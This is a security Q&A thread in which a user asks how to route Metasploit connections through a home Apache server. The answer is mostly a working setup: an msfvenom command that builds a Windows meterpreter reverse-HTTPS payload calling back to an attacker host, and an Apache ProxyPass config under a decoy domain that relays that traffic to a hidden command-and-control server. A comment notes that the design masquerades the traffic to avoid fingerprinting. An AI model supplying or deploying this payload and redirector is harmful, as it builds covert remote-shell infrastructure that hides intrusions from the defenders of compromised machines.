1
I'd like to set up a static Apache webserver at home that forwards all incoming Metasploit connections to another IP. Is this possible? If so, how? I am looking to run the Apache server on a RasPi B+ if that helps.
Forward Metasploit Requests to another ip
Answers
2
First, create the payload:
msfvenom -p windows/meterpreter/reverse_https LHOST=<IP OR DOMAIN NAME> LPORT=<PORT or 443> LURI=/myawesomecnc -o /root/cat.exe
The most important part is the LURI which you need to set to a specific resource. All the traffic generated by the payload will be directed towards this URI.
Once this is complete, use the ProxyPass directive in either Apache or nginx to forward only the traffic of /myawesomecnc to the specific host you want. Here is an example of Apache:
<VirtualHost *:443>
ServerName www.totallyharmless.com
...
ProxyPass /myawesomecnc/ http://1.2.3.4/myawesomecnc/
ProxyPassReverse /myawesomecnc/ http://1.2.3.4/myawesomecnc/
...
</VirtualHost>
void_in
Posted 2018-05-03T03:35:10.190
Reputation: 121
4Welcome to Security SE! Can you provide more information about what you are trying to accomplish? – multithr3at3d – 2018-05-03T03:49:05.587
Building off the comment @multithr3at3d made, it’s unclear what you’re attempting. Apache is a webserver, and will only be able to redirect web traffic on the specific port so it will not be able to redirect all “metasploit connections” to remote hosts. However, if you have the Metasploit web UI running, and you simply want to sent UI web traffic to a different webserver, I would recommend using and Nginx reverse proxy. – SuperAdmin – 2018-05-03T03:57:31.237
@schroeder Not OP here but usually a valid Apache or nginx server is configured in front for two purposes: to forward requests of separate campaigns to separate C&C servers, and to masquerade the requests as going to legitimate HTTP servers to avoid fingerprinting. – None – 2018-05-03T15:46:26.747
@void_in yeah, the fingerprinting angle makes a lot of sense, actually – schroeder – 2018-05-03T16:28:50.860